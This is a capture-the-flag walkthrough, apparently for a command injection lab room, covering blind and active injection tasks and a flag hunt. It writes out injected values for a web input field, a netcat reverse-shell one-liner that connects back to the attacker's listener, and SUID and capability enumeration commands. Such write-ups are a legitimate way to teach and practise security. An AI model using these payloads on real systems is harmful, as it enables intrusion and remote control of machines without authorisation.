[Task 3] Blind Command Injection
- Ping the box with 10 packets. What is this command (without IP address)?
Access the site
Prepare attacker machine to accept for ping command
tcpdump ip proto \\icmp -i tun0
; ping -c 10 <attacker ip>
Back to attacker machine, success!!!
2. Redirect the box’s Linux Kernel Version to a file on the web server. What is the Linux Kernel Version?
I will get the reverse shell.
nc -lvp 1234
Reverse shell reference:
Reverse Shell Cheat Sheet
If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards…
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f
Paste the command and submit.
Back to listener, now I have a shell
3. Enter “root” into the input and review the alert. What type of alert do you get?
4. Enter “www-data” into the input and review the alert. What type of alert do you get?
5. Enter your name into the input and review the alert. What type of alert do you get?
[Task 4] Active Command Injection
- What strange text file is in the website root directory?
2. How many non-root/non-service/non-daemon users are there?
The answer is zero.
3. What user is this app running as?
4. What is the user’s shell set as?
5. What version of Ubuntu is running?
6. Print out the MOTD. What favorite beverage is shown?
[Task 5] Get The Flag!
- Get the flag!
Import TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
After all of these, I’m hitting the wall. Looking at hint may help
No privesc!!! Maybe there’re hidden flag.
find / 2>>/dev/null | grep -i "flag"